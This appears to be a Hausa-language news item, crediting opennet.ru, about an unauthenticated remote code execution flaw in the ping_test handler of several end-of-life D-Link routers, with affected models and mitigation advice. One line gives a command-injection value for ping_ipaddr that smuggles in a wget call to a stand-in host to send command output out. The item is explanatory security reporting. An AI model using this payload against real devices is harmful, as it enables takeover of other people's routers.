A cikin D-Link mara waya ta hanyar sadarwa haɗari mai haɗari (), wanda ke ba ka damar aiwatar da lamba daga nesa a gefen na'urar ta hanyar aika buƙatu ta musamman zuwa ga mai sarrafa "ping_test", ana iya samun dama ba tare da tantancewa ba.
Abin sha'awa, bisa ga masu haɓaka firmware, kiran "ping_test" ya kamata a yi shi ne kawai bayan an tabbatar da shi, amma a zahiri ana kiran shi a kowane hali, ba tare da la'akari da shiga cikin haɗin yanar gizon ba. Musamman, lokacin shiga cikin rubutun apply_sec.cgi da wuce sigar "action=ping_test", rubutun yana turawa zuwa shafin tabbatarwa, amma a lokaci guda yana aiwatar da aikin da ke da alaƙa da ping_test. Don aiwatar da lambar, an yi amfani da wani lahani a cikin ping_test kanta, wanda ke kiran ping utility ba tare da bincika daidai adireshin IP ɗin da aka aika don gwaji ba. Misali, don kiran mai amfani da wget da canja wurin sakamakon umarnin “echo 1234” zuwa mai masaukin baki, kawai saka siga “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
An tabbatar da kasancewar raunin a hukumance a cikin waɗannan samfuran:
- DIR-655 tare da firmware 3.02b05 ko fiye;
- DIR-866L tare da firmware 1.03b04 ko fiye;
- DIR-1565 tare da firmware 1.01 ko fiye;
- DIR-652 (babu bayani game da nau'ikan firmware masu matsala da aka bayar)
Lokacin tallafi na waɗannan samfuran ya riga ya ƙare, don haka D-Link , wanda ba zai saki sabuntawa a gare su ba don kawar da rashin lahani, baya bada shawarar yin amfani da su kuma yana ba da shawarar maye gurbin su da sababbin na'urori. A matsayin tsarin tsaro, zaku iya iyakance damar shiga yanar gizo zuwa amintattun adiresoshin IP kawai.
Daga baya an gano cewa raunin shima ya kasance model DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 da kuma DIR-825, shirye-shirye don sakewa updates ga wanda ba a sani ba tukuna.
source: budenet.ru